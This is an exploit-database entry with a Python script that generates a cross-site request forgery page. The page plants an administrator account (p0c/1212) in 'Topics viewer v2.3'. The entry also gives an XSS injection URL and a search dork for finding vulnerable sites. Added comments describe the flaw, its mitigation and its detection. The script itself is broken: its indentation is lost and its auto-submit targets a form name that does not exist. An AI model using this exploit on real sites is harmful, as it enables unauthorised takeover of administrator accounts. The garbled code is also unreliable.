Topics viewer v 2.3 CSRF (Add Admin) / XSS Vulnerabilities



EKU-ID: 2121 CVE: OSVDB-ID:
Author: Cyber-Crystal Published: 2012-05-15 Verified: Verified



#!/usr/bin/env python
########################################################################
# Title    : Topics viewer v 2.3 csrf Add Admin and XSS
# Author   : Cyber-Crystal
# Version  : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork     : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# CVE : 14 May 2012
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
#
#
# Xss Exploit is Here :
# http://localhost//admincp/edit_block.php?id=XSS

import sys
import string
import os


def banner():
    """Print the usage text; the script expects one argument, the target base URL.

    Python 2 syntax (print statement). Indentation of this function body was
    lost in the paste; as written the block does not parse on any interpreter.
    """
print '''
----------------------------------
Topics viewer v 2.3 csrf Add Admin
----------------------------------

[+] python Exploit.py http://www.exp.com 
'''
# Clear the console before anything else is printed. Indentation was lost in
# this paste: the block reads as top-level code (runs before the argument check
# below), but it may originally have belonged to banner() -- cannot tell here.
# os.system() is called with fixed, non-user-controlled strings only.
if os.name == "nt":
os.system("cls")
os.system("color e")
else :
os.system('clear')

# Usage check: one positional argument (the target site) is required.
if len(sys.argv) < 2:
banner()
sys.exit()

# Naive host extraction: strips "http://" and then every "/" from argv[1].
# "https://" is not handled and a URL carrying a path is collapsed into one
# token, so the generated form action is only right for a bare "http://host".
vic = sys.argv[1].replace("http://","").replace("/","")
# Output goes to Exploit.html in the current working directory. `file` shadows
# the Python 2 builtin of the same name and is never closed explicitly; the
# write relies on the buffer being flushed at interpreter exit.
file = open("Exploit.html", "w")


# The generated page is a cross-site form that POSTs an add-admin request to
# the target's admin panel with the fixed credentials below. This is the CSRF
# finding itself: the request carries no per-session anti-forgery token, so if
# an authenticated administrator's browser loads this page, the browser attaches
# the admin's session cookie and the application cannot tell the forged request
# from a legitimate one.
# NOTE(review): the "Any number" remark on the 'verification' field is the
# author's claim that the field is not validated server-side -- not checked here.
# Mitigation (application side): bind state-changing admin actions to an
# unpredictable per-session token (synchronizer token pattern), issue session
# cookies with SameSite=Lax/Strict, and reject POSTs whose Origin/Referer does
# not match the site.
# Detection: an unexpected administrator account with these fixed values
# (user "p0c", e-mail "p0c@p0c.com") appearing in the user table, or POSTs to
# admincp/main.php?op=add-admin arriving with an external Referer.
db = ("<html>\n"
"<body>\n"
"<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
"<input type='text' name='u_name' value='p0c' />\n"
"<input type='text' name='u_m_pass' value='1212' />\n"
"<input type='text' name='u_email' value='p0c@p0c.com' />\n"
"<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
"<script>document.xss.submit();</script><br />\n"
"<input type='submit' value='Exploit'/>\n"
"</form>\n"
"</body>\n"
"</html>\n")

# Write the page and echo the credentials that the forged request would create.
file.write(db)
print "Createing ...\n"
print "user Name And Password ...\n"
print "User : p0c \t Pass : 1212"

# The End